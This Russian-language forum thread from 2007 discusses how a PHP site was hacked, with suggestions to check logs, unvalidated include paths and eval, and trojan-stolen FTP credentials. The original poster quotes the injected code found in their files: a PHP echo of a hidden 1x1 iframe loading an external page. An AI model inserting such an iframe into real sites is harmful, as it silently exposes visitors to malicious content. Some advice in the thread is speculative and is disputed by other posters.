взлом через include или нет

[Nicca]

взлом через include или нет

У меня стартовая страница имеет такой вид:

include('lng.php');
include('top_page.php');
include('content.php');
include('bot_page.php');

Сегодня взломали сайт. Возможен ли взлом через инклуд? Или нет

 

[phprus]

Возможен ли взлом через инклуд?

Возможен, если в качестве пути к файлу используется непроверенные параметры полученные от пользователя.

А вообще смотри логи сервера (access.log и error.log). Это поможет определить причину взлома.

 

[Nicca]

Мне в некоторые файлы вживили вот такой код

echo "<iframe src='http://www.radio.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";

 

[Alexandre]

у меня недавно взломали один знакомый сайт, как в последствии выяснилось, ftp ссылка была передана в открытом виде через IE и был осуществлен ftp-доступ с помощью IE. очевидно где-то перехватили, или дырка в ИЕ.

вообще смотри логи сервера (access.log и error.log). Это поможет определить причину взлома.

еще надо смотреть логи messages.log и ftp логи. Могли найти дырку в самой Ось.

-~{}~ 03.05.07 14:21:

по логам выяснилось, что ломали через китайцев или это был китайский робот.

-~{}~ 03.05.07 14:23:

вообще, проверь весь код, где есть любой ввод пользовательских данных. что там и как ескейпится...
есть ли использование eval - это потенциальная дыра...
есть ли использование $$var, safe mode ну и много всяких еще причин может быть.

 

[Nicca]

Кстати насчет ІЕ Он в последнее время начал страшно глючить и вобще не загружаться. Нашел у себя пару вирусов. В основном троянов.
Может действительно кто-то получил фтп доступ к сайту. Только смысл постить им всякие ифреймы. Не пойму. Могли уже что-то пооригинальнее придумать

-~{}~ 03.05.07 14:38:

ДА так и есть. Вот ссылка. Советую всем прочитать:

http://forum.searchengines.ru/showthread.php?t=126831

 

[Alexandre]

Nicca - это дело рук ботов, они берут страницы с одних сайтов и суют эти страницы на другие сайты. притом, почему-то портят только index.php , другие пхп файлы не портят.

 

[Фанат]

Alexandre
Это дело рук троянов

 

[Alexandre]

Это дело рук троянов

ну боты и трояны взаимосвязанны... трояны крадут пароли и отсылают их ботам, а боты бомбят сайты.

 

[kruglov]

Кстати насчет ІЕ Он в последнее время начал страшно глючить и вобще не загружаться

Автообновление разных критических апдейтов стоит?

 

[Череп]

Вон почитай лучше http://www.e1.ru/talk/forum/read.php?f=37&i=101772&t=101772

 

[cDLEON]

Alexandre
Больше твои советы не слушаю 8)
Более крутого бреда не слышал даже от новичка 8)

 

[OZ]

Nicca, ты на инфобоксе, видимо, хостишься. Их форум почитай.